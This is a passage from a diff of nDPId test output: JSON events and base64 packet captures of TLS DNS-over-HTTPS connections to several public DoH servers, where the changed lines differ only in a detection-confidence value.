xxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZ
xhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} 
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01Cyq
bL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn
6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} -00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP
7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103
